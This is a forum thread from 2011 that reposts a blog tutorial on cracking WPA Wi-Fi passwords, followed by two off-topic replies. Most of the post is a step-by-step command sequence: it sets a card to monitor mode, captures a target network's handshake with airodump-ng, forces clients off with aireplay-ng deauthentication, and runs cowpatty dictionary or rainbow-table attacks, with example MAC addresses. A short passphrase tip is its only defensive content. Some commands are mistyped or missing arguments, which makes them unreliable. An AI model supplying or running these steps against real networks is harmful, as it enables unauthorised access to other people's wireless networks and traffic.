Hacking the WPA Airwaves By Bennet

Computer security issues, hacker & phreak news, conferences, Q&A, etc.

Computer chat, coding, reviews, hardware or software...

Share your infos!
Post Reply
User avatar
Stevyn
SysOp
Posts:1786
Joined:Mon Nov 09, 2009 10:03 am
Location:Japan
Contact:
Hacking the WPA Airwaves By Bennet

Post by Stevyn » Fri May 13, 2011 9:17 am

Code: Select all

Hacking the WPA Airwaves
By
Bennet
" http://pauldotcom.com/2011/05/hacking-the-wpa-airwaves.html"

It is interesting how many people believe that their wireless is secure because they are using WPA. Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table. The cool thing is I bought an ALFA usb antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless car in promiscuous mode)

kismet -c wlan0

•close console window to see collection of packets
•use alt + k to get to top pull down menu's, turn on ability to see type of access points bsid and guess at IP address, channel #
Cntrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c -bssid -w wlan0

Example:

airodump-ng -c 9 -bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0 * Note D-Link-01.cap is where the capture of all traffic will go

Now open another window as we need to force a re-conect from the target (see the Note below)

aireplay-ng -a -c wlan0

Example:

airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the trafic in the D-Link01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r -d -s

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r -f -s

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has alot of cell phones like the iphone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless ethernet card has a wake-up when the screen is activated. So you don't need to send de-auth all you got to do is hang around long enough for someone to touch their Iphone or whatever cell and have it wake up it's wireless and re-auth to the network, in other words there is the weakest link! -- LOL!

Happy Cracking

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY--I'm Out

~Mark Bennett
http://offensive-security.com/wpa-tables
offensive-security.com

Contact me directly: Ironfeatherbooks (@) gmail.com

Image

Alexander Mundy
Posts:84
Joined:Mon Nov 23, 2009 7:50 am

Re: Hacking the WPA Airwaves By Bennet

Post by Alexander Mundy » Wed Jun 08, 2011 9:22 am

I am proud of you for keeping our internet see cure from cash and bandwidth grabbers,
like Google and Facebooger. Thanks.


here are some cool links

http://packetstormsecurity.org


http://www.c4i.org/

Alexander Mundy
Posts:84
Joined:Mon Nov 23, 2009 7:50 am

Re: Hacking the WPA Airwaves By Bennet

Post by Alexander Mundy » Sat Sep 03, 2011 4:40 am

Here's the site of an awesome org.

http://www.kateycharles.com/

They have contracts to send and wharehouse info for the largest school districts in the U.S.

They're perfect. No one can mess with the public schools or their teachers unions.

NO one.

Post Reply